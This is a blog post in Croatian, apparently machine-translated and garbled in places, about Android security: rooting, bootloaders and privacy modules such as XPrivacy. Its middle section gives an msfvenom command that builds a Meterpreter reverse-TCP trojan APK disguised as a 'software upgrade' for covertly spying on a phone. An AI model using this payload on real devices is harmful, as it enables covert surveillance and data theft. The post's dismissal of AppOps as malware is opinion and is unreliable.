Izvor slike: pixabay.com

Uvod u Android

U ovoj ćemo temi upoznati Android i Open Source Sigurnost (OS). Android je platforma otvorenog koda. Djelomično je poput Linuxa, ali ipak se previše razlikuje od Linuxa. Linux je previše sazrio u usporedbi s Androidom. Dakle, ovo je Chetan Nayak, i dobrodošli na moj sljedeći blog o Open Source Web Securityu. Napisao sam ovaj blog pretpostavljajući da bi većina nas koristila Android K, tj. Kitkat ili Android L tj. Lollipop.

Razlog Gingerbread i Jellybean imao je puno sigurnosnih pitanja otvorenog koda o kojima ne mogu raspravljati u ovom blogu. Dakle, možda ću o tome razgovarati sljedeći put kada se dublje pozabavim starijim verzijama Androida. Dakle, od sada, držimo se KitKat-a i Lollipopa.

Android je dizajniran s obzirom na programere. Sigurnosne kontrole dizajnirane su tako da smanje opterećenje za programere. Programeri koji rade na sigurnosti mogu lako raditi i pouzdati se u fleksibilne sigurnosne kontrole. Programeri koji manje poznaju sigurnost bit će zaštićeni sigurnim zadanim postavkama.

Početak

Nisam bio puno za android sve do kasnijeg tromjesečja 2013. godine kada sam imao svoj prvi Android mobitel koji je bio Sony Xperia L (na temelju 4.2.2 od tada). K vragu, čak sam i mrzeo android razlog što je bio izuzetno zaostajan, pogotovo Samsung uređaji. Tada sam čak razmišljao o kupovini Windowsa Lumia, ali srećom, igrao sam puno igara i morao sam kupiti Xperia L, jer je ova ćelija bila Lag Proof. Imao je oko 1 gig RAM-a i Adreno 305. Dovoljno cool da bilo što pokrene.

Nakon što sam igrao puno igara poput NOVA3 i ModernCombat4, dosadio mi je u toj ćeliji u roku od mjesec dana. Znao sam da se Android temelji na Linuxu i htio sam napraviti neke svoje izmjene na tome. Počeo sam čitati o prilagodbama i naučio o tome što se naziva "Ukorijenjivanje". Budući da sam imao dobar backhand u Linuxu, korijenje nije bilo problem za mene. Uz malo pomoći XDA, uspio sam uspješno korijeniti svoju stanicu.

Ali tada me nešto pogodilo. Čim se moja ćelija ponovno pokrenula nakon ukorijenjenja, tek je počelo pokretanje sustava (zaglavljeno na zaslonu za podizanje sustava zauvijek). Nisam ni znao koji je bootloader bio na androidu. Dakle, nisam mogao učiniti ništa. Bilo mi je svega mjesec dana kada sam kupio novu ćeliju i moja je ćelija sada bila mekana cigla. Uvijek čitam ukorijenjivanje je opasno, ali nisam znao da će to opeknuti moju ćeliju. Ali bila sam u krivu. Dok sam neprestano čitao jedne i druge stvari o ukorjenjivanju, saznao sam da puštanje korijena ne opeče vaš telefon.

Ukorijenjivanje je slično sličnom Adminsovom pristupu na računalu (ustvari to je pristup sustavu, ali napisao sam Admin Access, tako da je za noobove lako razumjeti.). To znači da ukorjenjivanje nikada neće zagraditi vaš telefon. To je onaj koji je podigao taj sustav podigao moj telefon. Za ljude koji ne znaju program za pokretanje programa; bootloader je sličan BIOS-u u sustavu Windows. (Ako ne znate što je BIOS, uopće ne biste trebali ni čitati na razmišljanje o sigurnosti.) Bootloader ili Hboot (tako se zove Android) prva je stvar koja se pokreće prilikom podizanja sustava Android uređaj.

Pakira upute za dizanje jezgre operacijskog sustava i većina ih je posebno dizajnirana za izvođenje vlastitog okruženja za uklanjanje pogrešaka ili modifikacija.

Sigurnosna provjera sustava Android

Zamislite program za pokretanje uređaja kao sigurnosnu kontrolnu točku svog uređaja. Ako probijete ovu kontrolnu točku, izgubit ćete sve što imate na telefonu. Dakle, kažem da je to dobra sigurnosna značajka. Jer ako izgubite telefon, a netko pokušava dobiti korijenski pristup da bi zaobišao bravu (pod pretpostavkom da ste zaključali svoj uređaj s PIN-om ili lozinkom.), On će obavezno morati otključati alat za pokretanje sustava, što će rezultirati brisanjem vaših podataka na telefon.

Dakle, ne morate brinuti da će netko zloupotrijebiti. Dakle, sličan je slučaj i s prilagođenim ROM-ovima. ROM-ovi su operativni sustavi temeljeni na verzijama Androida posebno dizajniranim za vašu hardversku arhitekturu. Dakle, ako provjerite na XDA, za svoj telefon imat ćete n broj prilagođenih ROM-a za vaše telefone, od kojih su neki najpoznatiji Cyanogen Mod ROM-ovi, koji su već unaprijed ukorijenjeni i dolaze s unaprijed definiranim setom prilagodbi.,

Sigurnost prekoračenja Androida

Od sada možda razmišljate da imate siguran mobitel. Ali tu sam da vam ponovo dokažem da ste pogriješili i to je suština ovog bloga. Do drugog tromjesečja 2014. ljudi su već počeli razvijati eksploatacije i rootkite za Android, koji bi mogli korijeniti vaše mobitele, a da nisu ni otključali bootloader.

Nije dovoljno zastrašujuće? Dopustite da vam kažem najopasniji dio. Čak su mogli instalirati Trojance unutar toga. Dakle, čak i ako bi policajci mogli pronaći trag, a čak i dobiti svoju stanicu, još uvijek postoji veliki rizik da bi mogli vidjeti sve što radite na svom telefonu. To sam pokušao kao eksperiment u stvarnom praktičnom okruženju.

Za ovaj napad koristio sam Metasploit. Ono što sam učinio jest da sam stvorio trojanski program i instalirao ga u ciljni telefon. Bila je to jednostavna apk datoteka i nazvao sam je softverskom nadogradnjom. Dakle, ako je korisnik samo običan čovjek koji ima samo bitne i bajtne podatke o sigurnosti, onda se neće usuditi ukloniti ga. Pobrinuo sam se da se svaki put kad se aktivira internet, zlonamjerni softver koji sam stvorio automatski izvrši i poveže natrag na moj udaljeni ulaz na glavnom računalu.

Za napad su korištene sljedeće naredbe (Metasploit je softver za prodiranje koji pomaže provjeriti ranjivosti na platformi ili određenim uređajima.)

IP adresa mog domaćina: 192.168.xx.xx

Luka mog domaćina (za povezivanje natrag): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Dakle, ovdje sam stvorio obrnuti TCP kanal na svom računalu. Dakle, svaki put kad internet pokrene na androidu, otvorit ću se školjki na mom Kali stroju ili na stroju na koju sam instalirao Metasploit.

Dakle, sada znate koliko je zastrašujuće za osobu koju čak ni ne znate, ima evidenciju o svakoj transakciji koju obavljate putem svojeg mobitela, svaki drugi kontakt, WhatsApp poruke, SMS, Viber i Skype dnevnik poziva i sve. Ako to nije zastrašujuće, onda ne znam što je.

Preporučeni tečajevi

  • Certifikacijski tečaj u Ruby Debuggingu
  • Kompletan PHP MySQL tečaj
  • Online tečaj za certificiranje u VB.NET programiranju
  • Online tečaj fondacije ITIL

Pokrivenost

Dosta o sigurnosnim pitanjima. Svi znamo da svaka druga platforma ima sigurnosna pitanja. Kako smo onda mogli biti sigurni? To nije sasvim točno. Platforme se mogu osigurati do određene točke, ali nakon toga, na nama je da osiguramo da ostane tako. U svijetu sigurnosti postoji zloglasni citat:

„Socijalni inženjering: Zato što nema mrlje za ljudsku glupost“

Ovu sam frazu čuo davno dok sam gledao konferenciju DefCon.

Kad ne postoji tehnička ranjivost koju treba iskoristiti, pokušajte hakirati ljude. A, pod tim, ne mislim na hipnotizam i slične stvari. Mislim na socijalni inženjering. Možete pročitati moj drugi blog "Važnost cyber sigurnosti u našem svakodnevnom životu" za više informacija o tome.

Glavna sigurnosna funkcija Androida

Osim toga, socijalni inženjering, za što se možete pobrinuti samo ako ste pametni; postoje načini kako možete razvijati android aplikacije na siguran način kako biste bili sigurni da će tako i ostati.

Evo nekoliko osnovnih sigurnosnih značajki koje vam pomažu u stvaranju sigurnih aplikacija:

  • Sandbox uređaja s Androidom, koji izolira podatke vaše aplikacije i izvršenje koda od drugih aplikacija.
  • Aplikacijski okvir s robusnim implementacijama zajedničkih sigurnosnih funkcija poput kriptografije, dozvola i sigurnog IPC-a.
  • Šifrirani datotečni sustav koji se može omogućiti da zaštiti podatke na izgubljenim ili ukradenim uređajima.
  • Korisnička odobrenja za ograničavanje pristupa značajkama sustava i korisničkim podacima.
  • Dopuštenja definirana aplikacijom za kontrolu podataka aplikacija na osnovi aplikacije.

Što možete učiniti ako želite sigurno okruženje, ali niste programer?

Od Androida 5, tj. Lollipopa, pruža značajku gdje korisnik može dodati više profila i ograničen način rada za upotrebu telefona i tableta. Osim toga, ako ste ugradili svoj telefon, postoje android aplikacije u Xposed modulima kao što su AppOps, Xprivacy ili Privacy Guard koji vam mogu pomoći da se brinete o gotovo svemu. Za to morate instalirati Xposed Framework.

Xposed Framework je ono što omogućava da Xposed moduli rade. Izloženi moduli omogućuju vam promjenu ponašanja Apk datoteka i sistemskih datoteka bez potrebe za instaliranjem drugog ROM-a. Izmjene su također jednostavne za poništavanje, tako da je ovdje malo rizika i to čak nije puno vremena jer nema potrebe za flashom više ROM-a, kernela i njihovih ispravki programskih pogrešaka.

Xprivacy, zaštita privatnosti i AppOps izloženi su moduli koji vam omogućavaju da svoj android osigurate odabirom aplikacije koja bi trebala imati pristup onome što su Internet, tipkovnica, sdcard, root pristup i puno drugih stvari. Možete čak onemogućiti pristup samo određenim uslugama i stvoriti korisničke predloške za to. Što se mene tiče, radije biram Xprivacy. No, evo nekih informacija ili razlika ako se želite razlikovati od toga da izaberete između gore navedene tri.

AppOps:

Izvorno je to uveo Google u Android 4.3. (To je glavni razlog što ga ne podržavam. Ne vjerujem u Google. Nazovite ga Paranoia, ali google prati sve što radite. I ne treba mi netko da prati sve što radim, ali ako vjerujete Googleu, idi za tim.). Glavno ograničenje AppOps-a je da Google dopušta samo blokiranje pristupa onim aplikacijama koje želi da blokirate.

To znači da ako želite blokirati aplikacije povezane s Googleom, poput Play Services (koje zapravo troše više od 50% vaše normalne memorije, baterije i podataka (internet)), to nećete moći. To je još jedan razlog za mržnju Googlea. Dakle, vjerujem da AppOps za mene nije ništa drugo nego zlonamjerni softver. (ali to samo mislim na taj način, nije ako samo srcem vjerujete Googleu)

Zaštita privatnosti:

Zaštita privatnosti je jednostavno sučelje koje je Cyanogen Mod zamijenio za AppOps. Ako ste početnik, onda vam predlažem da to koristite jer ima samo preklopni gumb za isključivanje i vlastite definirane predloške za to koja bi aplikacija trebala imati pristup onome. To nije sigurno ako postoji zlonamjerni softver koji djeluje ili se lažno predstavlja kao sistemska aplikacija. Ali dobro je započeti.

Xprivacy:

Xprivacy je alat All in one. No, namijenjen je stručnjacima. Možete ga usporediti s nožem švicarske vojske. Ima sve u sebi i može vaš telefon osigurati na svaki drugi način, ali ako ne znate što radite, to će samo zabrljati vaš telefon i zaustaviti aplikacije čak i od samog pokretanja. Također možete ograničiti pristup sistemskim aplikacijama. Ovo je ono što osobno radije biram.

Pored gore spomenutih modula, postoje čak i drugi moduli poput svjetlosnog zida svjetlosti ili BootManager u Xposedu, koji mogu pomoći ograničiti pristup internetu određenim aplikacijama i spriječiti pokretanje aplikacija uz sustav prilikom ponovnog pokretanja telefona.

Dakle, to bi bilo to za ovaj blog. U slučaju sigurnosnih pitanja sigurno možete posjetiti ili biti član XDA web stranice koja vam može dati puno više informacija o privatnosti.

Preporučeni članci: -

Ovo je vodič za Android. Ovdje smo razgovarali o osnovnom konceptu, sigurnosnim kontrolnim točkama i temeljnoj sigurnosnoj funkciji Androida. Možete i proći naše druge predložene članke da biste saznali više -

  1. Android Intervju pitanja - Top 10 korisnih pitanja
  2. 8 korisnih alternativa Siri za Android
  3. 28 najboljih savjeta i trikova za alate za razvoj Android aplikacija
  4. Karijere u razvoju Androida

Kategorija: